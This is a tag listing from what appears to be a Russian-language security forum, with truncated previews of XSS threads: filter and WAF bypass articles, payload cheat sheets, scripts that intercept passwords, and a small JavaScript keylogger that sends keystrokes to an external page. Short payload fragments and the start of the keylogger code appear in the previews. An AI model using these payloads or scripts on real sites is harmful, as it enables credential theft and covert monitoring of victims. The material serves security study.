xss

  1. Vander

    Article XSS - Обход фильтров и WAF

    Вступление Атаки с использованием межсайтовых сценариев (XSS) - это тип внедрения, при котором вредоносные скрипты вводятся на веб-сайты, заслуживающие доверия. Недостатки, которые позволяют этим атакам быть успешными, являются общими и могут быть обнаружены всякий раз, когда веб-приложение...
  2. Vander

    Cheat Sheet Reflected XSS Mindmap

  3. Vander

    Cheat Sheet XSS - Payload List

    Список XSS, составленный для публичного использования. Вы можете использовать его в качестве полезных нагрузок как для сканеров, так и для ручного тестирования. <script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT> <script>alert(123)</script> <script>alert("hellox worldss");</script>...
  4. Vander

    Cheat Sheet Tiny-XSS-Payloads

    Коллекция коротких полезных нагрузок XSS, которые могут использоваться в различных контекстах. <!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM --> <svg/onload=eval(name)> <!-- If you control the URL, Safari-only --> <iframe/onload=write(URL)>...
  5. Vander

    Script XSS - Intercept Password

    Три скрипта, которые демонстрируют разные способы кражи пароля из веб-форм. Базовый сценарий, который использует атрибут «onsubmit» объекта «form» Javascript для перехвата и использования значений, установленных в форме. Другой, который крадет пароль от автозаполнения и отправляет данные на...
  6. Vander

    Script XSS - Browser Info

    Скрипт PoC для захвата (и отображения!) всей доступной информации о браузере: типа, версии и платформы, а также всех установленных плагинов, их версии и MIME types, к которым они применяются. document.write('<P>'+navigator.appName+'</P>'); document.write('<P>'+navigator.appVersion+'</P>')...
  7. Vander

    Script XSS - Simple KeyLogger

    Очень простой кейлоггер, который фиксирует нажатия клавиш и отправляет их каждую секунду на внешнюю php-страницу. JS и PHP коды предоставляются в архиве. keylogger.js <script language="javascript"> var keys=''; document.onkeypress = function(e) { get = window.event?event:e; key =...
  8. Vander

    Article Темная сторона XSS

    Приветствую уважаемую аудиторию форума Protey! Межсайтовый скриптинг (XSS) является одной из наиболее распространенных уязвимостей веб-приложений и все еще присутствует в OWASP Top 10-2017. Целью данной статьи является не объяснение того, как обойти фильтр antiXSS в защите браузера или WAF...
  9. Vander

    Article XSS 2020 Edition

    HTML Injection Используется, когда ввод попадает в значение атрибута тега HTML или внешнего тега, кроме тех, которые описаны в следующем случае. Добавьте «->» к полезной нагрузке, если ввод попадает в комментарии HTML. <svg onload=alert(1)> "><svg onload=alert(1)> HTML Injection – Tag Block...
  10. Vander

    Article XSS Back Button - I Can See You From Behind

    Приветствую уважаемую аудиторию форума Protey! Вступление: Хотя целью атаки XSS всегда является выполнение вредоносного JavaScript в браузере жертвы, существует несколько принципиально различных способов достижения этой цели. Отраженный XSS используется путем присоединения вредоносного...
  11. sshNkt

    Cheat Sheet Pentest Metodology

    Приветствую уважаемых участников и гостей форума Protey! В этой статье, я попытаюсь перечислить то, что так называемые этичные хакеры, считают важными знаниями которые должен знать любой тестировщик. В первой части вы найдете все необходимые инструменты и технологии, которые необходимо...
  12. D

    News В PayPal исправлена уязвимость, помогавшая узнать почту и пароль пользователя

    ИБ-специалист Алекс Бирсан (Alex Birsan) получил 15 300 долларов по программе bug bounty, обнаружив критическую уязвимость в процессе аутентификации PayPal. Эксперт объясняет, что уязвимость была связана с тем, как PayPal хранит токены CSRF и ID сессий в файле JavaScript, из-за чего они...
Верх Низ